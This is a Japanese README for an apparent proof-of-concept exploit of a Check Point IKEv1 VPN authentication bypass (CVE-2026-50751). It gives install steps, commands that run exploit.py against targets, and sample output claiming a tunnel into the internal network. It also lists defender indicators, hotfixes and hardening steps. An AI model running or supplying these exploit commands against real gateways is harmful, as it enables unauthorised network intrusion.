
脆弱性: リモートアクセスおよびモバイルアクセスにおけるロジックフローの脆弱性
このコードは教育目的および許可されたセキュリティテストにのみ使用してください。 明示的な許可なくシステムに対して不正に使用することは違法です。 著者は本ツールの誤用について一切の責任を負いません。
CVE-2026-50751 は、Check Point の IKEv1 (非推奨) プロトコルにおける重大な認証バイパスの脆弱性であり、Remote Access VPN および Mobile Access に影響を与えます。認証されていない攻撃者が、証明書検証の欠陥を悪用して、有効なパスワードなしで VPN 接続を確立する可能性があります。
| 製品 | バージョン |
|---|---|
| Security Gateways | IKEv1 が有効な R80.40 - R82.10 |
| Spark Firewalls | R80.20.X, R81.10.X, R82.00.X |
| Mobile Access | IKEv1 が有効なすべてのバージョン |
# リポジトリのクローン
git clone https://github.com/username/CVE-2026-50751-PoC
cd CVE-2026-50751-PoC
# 依存関係のインストール
pip install -r requirements.txt
# 実行権限の付与
chmod +x exploit.py
cryptography>=41.0.0
scapy>=2.5.0
# IKEv1 が有効かどうかを検出
python3 detector.py -t 192.168.1.1 -p 500
# 高速スキャン
python3 detector.py -t vpn.target.com -p 4500
# 認証バイパスの実行
python3 exploit.py -t 192.168.1.1 -p 500
# 特定のインターフェースを使用
python3 exploit.py -t vpn.target.com --interface eth0
# 詳細モード
python3 exploit.py -t 192.168.1.1 -p 500 -v
╔═══════════════════════════════════════════════════════════════╗
║ CVE-2026-50751 - Check Point IKEv1 Authentication Bypass ║
║ Critical VPN Authentication Bypass Exploit ║
║ CVSS: 9.3 | CISA KEV: 2026-06-08 ║
╚═══════════════════════════════════════════════════════════════╝
[1] Initiating IKEv1 Main Mode...
[+] Received response - SPI: a1b2c3d4e5f67890
[2] Sending crafted KE + NONCE payloads...
[+] Gateway accepted crafted KE/NONCE - Vulnerability triggered!
[3] Calculating authentication keys...
[4] Sending spoofed authentication...
[+] SUCCESS! Authentication bypassed!
[+] Established IKE SA without valid credentials
[5] Establishing VPN tunnel...
[+] VPN tunnel established!
[+] Internal network access available
[✓] EXPLOIT SUCCESSFUL
[✓] Authentication bypass achieved
[✓] VPN tunnel established
[!] System is VULNERABLE - Apply hotfix immediately
# 攻撃者を検出するクエリ
action:"Key Install" AND (src:45.77.149.152 OR dst:45.77.149.152)
| タイプ | 値 |
|---|---|
| 攻撃者の IP | 45.77.149.152, 209.182.225.136, 38.60.157.139, 162.33.177.101, 45.76.26.42, 144.208.127.155, 38.54.88.201, 38.54.107.167, 66.42.99.200, 45.63.104.106, 45.61.136.173 |
| ハッシュ | 52fda5c1b9704544f32ee98d9060e689, 51d39aa39478beeac94f2d12f682ecce |
| バージョン | ホットフィックステイク | リンク |
|---|---|---|
| R82.10 | Take 19 | ダウンロード |
| R82 | Take 103 | ダウンロード |
| R81.20 | Take 141 | ダウンロード |
レガシークライアントを無効化:
SmartConsole → Gateway → VPN Clients → Authentication
"Allow older clients" のチェックを外す
IKEv2 のみを強制:
Global Properties → Remote Access → VPN Authentication
"IKEv2 only" を選択
Machine Certificate を必須にする:
VPN Clients → Authentication → Machine Certificate Authentication
を "Mandatory" に設定
| 日付 | イベント |
|---|---|
| 2026-05-07 | 最初の悪用が観測される |
| 2026-06-04 | Check Point が調査を開始 |
| 2026-06-08 | CVE 公開、CISA が KEV に追加 |
| 2026-06-11 | CISA のパッチ適用期限 |
このソフトウェアは「現状のまま」提供され、いかなる種類の保証もありません。著者は本ツールの誤用について一切の責任を負いません。所有しているシステム、または明示的なテスト許可を得ているシステムでのみ使用してください。
バグの報告や貢献については:
⭐ この PoC が役に立ったなら、リポジトリにスターを付けることを検討してください
cryptography>=41.0.0
scapy>=2.5.0
colorama>=0.4.6
⚠️ GitHub 上の重要な注意事項: